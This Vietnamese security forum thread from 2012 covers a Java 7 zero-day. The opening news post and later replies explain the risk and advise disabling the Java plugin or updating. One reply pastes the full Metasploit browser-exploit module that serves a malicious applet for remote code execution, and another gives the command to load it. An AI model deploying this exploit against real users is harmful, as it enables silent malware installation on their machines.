banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime  XML
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 27/08/2012 12:15:14 (+0700) | #1 | 268810
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime Environments - Nguy cơ tấn công diện rộng vào người dùng cuối

Ngày 26/08/2012, Trong khi phân tích một mẫu malware có xuất xứ từ Trung Quốc các chuyên gia tại viện nghiên cứu bảo mật FireEye đã phát hiện một lỗi bảo mật 0-day cực kỳ nghiêm trọng trong Java Runtime Environment ( JRE ) ở hầu hết các phiên bản. Các chuyên gia xác nhận rằng đã khai thác thành công lỗi này trên Firefox bản mới nhất với JRE 1.7 update 6 ( phiên bản JRE mới nhất hiện nay ). Họ đã thành công trong việc cài đặt và kích chạy một virus (malware) trên máy tính thử nghiệm thông qua việc cho máy tính này truy cập một trang web trông có vẻ vô hại nhưng chứa mã khai thác.
Vấn đề trở nên nghiêm trọng hơn khi mã khai thác minh họa ( Proof-of-Concept ) đã được cung cấp rộng rãi trên internet cũng như sắp được cập nhật vào công cụ khai thác tự động nổi tiếng Metasploit. Các chuyên gia cảnh báo là có thể sẽ có một đợt tấn công diện rộng xảy ra do Oracle hiện vẫn chưa có kế hoạch cập nhật bản vá lỗi này.

Ý kiến của HVA: Đây là lỗi đặc biệt nghiêm trọng có thể sử dụng để cài đặt các loại malware như virus, trojan, keylogger… lên máy của nạn nhân thông qua một website trông có vẻ bình thường. Giả sử trong một trường hợp đáng ngại là các tin tặc thậm nhập được vào các website lớn như các trang tin, cổng thông tin, web-game… thì con số máy tính bị cài đặt mã độc sẽ lên đến hàng trăm thậm chí hàng ngàn vì chỉ cần người dung truy cập các trang web này với plugin Java Runtime cài đặt sẵn trong máy ( hầu hết máy tính đều có ) thì sẽ bị tin tặc âm thầm cài đặt mã độc lên máy.

Cách phòng chống: Vì hiện chưa có bản vá nên đề nghị người dùng nên tắt plugin Java Runtime Environments trong Firefox, chrome hoặc tạm thời gỡ bỏ JRE khỏi máy tính cho đến khi Oracle cung cấp bản vá cho lỗi này

xnohat – HVA News

Tham khảo:
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
http://pastie.org/4594319

Chú giải:
Lỗi 0-day: là các lỗi bảo mật được các tin tặc âm thầm phát hiện, đã có mã khai thác thành công, nhưng không công bố và nhà sản xuất chưa có bản vá kịp thời
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 27/08/2012 14:25:38 (+0700) | #2 | 268816
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Theo mặc định, các unsigned applets hay self-signed applet khi kích hoạt thường được cảnh báo (prompt) cho nên người dùng nên cẩn thận mà xem kỹ applet hiện lên có đáng tin cậy hay không. Phần lớn người cứ bấm bừa "OK" hay "Accept" là dính chấu dễ dàng thôi.

Nếu máy có antivirus và cho phép điều chỉnh không cho download những thứ như exe, bat, dll... thì applet đen tối cũng khó lòng mà thực thi.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 27/08/2012 15:06:05 (+0700) | #3 | 268818
thangdd.it49
Member

[Minus]    0    [Plus]
Joined: 29/06/2009 12:32:26
Messages: 1
Offline
[Profile] [PM]
Theo demo ở http://pastie.org/4594319 thì nó sẽ chạy calc.exe lên, tuy nhiên mình tìm hiểu thì applet chỉ cần sign là có thể gọi và chạy được các application của windows. Vậy thì lỗi ở đây là như thế nào nhỉ, mình không hiểu.
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 27/08/2012 23:35:49 (+0700) | #4 | 268833
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Đã có mã khai thác tự động thuộc Metasploit cho bug 0-day này

https://rstcenter.com/forum/57962-java-7-applet-remote-code-execution.rst
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 28/08/2012 08:55:38 (+0700) | #5 | 268838
[Avatar]
hoalucky
Member

[Minus]    0    [Plus]
Joined: 28/06/2007 23:22:57
Messages: 46
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 28/08/2012 16:53:22 (+0700) | #6 | 268847
kOi92
Member

[Minus]    0    [Plus]
Joined: 27/08/2012 15:42:51
Messages: 11
Offline
[Profile] [PM]
code này

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })

def initialize( info = {} )
super( update_info( info,
'Name' => 'Java 7 Applet Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
and Firefox across different platforms.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Discovery
'jduck', # metasploit module
'sinn3r', # metasploit module
'juan vazquez', # metasploit module
],
'References' =>
[
#[ 'CVE', '' ],
#[ 'OSVDB', '' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
],
'Platform' => [ 'java', 'win', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
}
],
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 26 2012'
))
end


def on_request_uri( cli, request )
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_wwwect(cli, get_resource() + '/', '')
return
end

print_status("#{self.name} handling request"smilie

send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
return
end

paths = [
[ "Exploit.class" ]
]

p = regenerate_payload(cli)

jar = p.encoded_jar
paths.each do |path|
1.upto(path.length - 1) do |idx|
full = path[0,idx].join("/"smilie + "/"
if !(jar.entries.map{|e|e.name}.include?(full))
jar.add_file(full, '')
end
end
fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb"smilie
data = fd.read(fd.stat.size)
jar.add_file(path.join("/"smilie, data)
fd.close
end

print_status("Sending Applet.jar"smilie
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

handler( cli )
end

def generate_html
html = "<html><head></head>"
html += "<body>"
html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
html += "</applet></body></html>"
return html
end

end
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 29/08/2012 19:40:23 (+0700) | #7 | 268882
[Avatar]
tranhuuphuoc
Moderator

Joined: 05/09/2004 06:08:09
Messages: 865
Location: Lầu Xanh
Offline
[Profile] [PM] [WWW]
Lỗi này xuất hiện khoãng ngày 26/08 , cách khai thác lỗi thì search trên Google
Nó cũng khá dễ
use exploit/multi/browser/java_jre17_exec

http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_exec

Chổ này khá hay, có thể tham khảo thêm.
http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 31/08/2012 06:08:44 (+0700) | #8 | 268919
[Avatar]
tranhuuphuoc
Moderator

Joined: 05/09/2004 06:08:09
Messages: 865
Location: Lầu Xanh
Offline
[Profile] [PM] [WWW]
Anh em xem bản cập nhật mới nhất tại đây
http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html

Nhận xét đánh giá về lỗi này , mặc định khi cài đặt Java SE thì tính năng "tự động cập nhật" phiên bản mới nhất được bật, tuy nhiên nó chỉ được cập nhật vào lúc 9h tối Chủ nhật mà thôi. smilie
[Up] [Print Copy]
  [News]   HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime 26/01/2013 19:05:12 (+0700) | #9 | 273059
[Avatar]
tdtv-bkt432
Member

[Minus]    0    [Plus]
Joined: 13/06/2012 02:14:06
Messages: 47
Location: /root/user...../null
Offline
[Profile] [PM]
Firefox đã chặn pluings của Oracle. Không biết Chrome đã chặn pluings này chưa
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|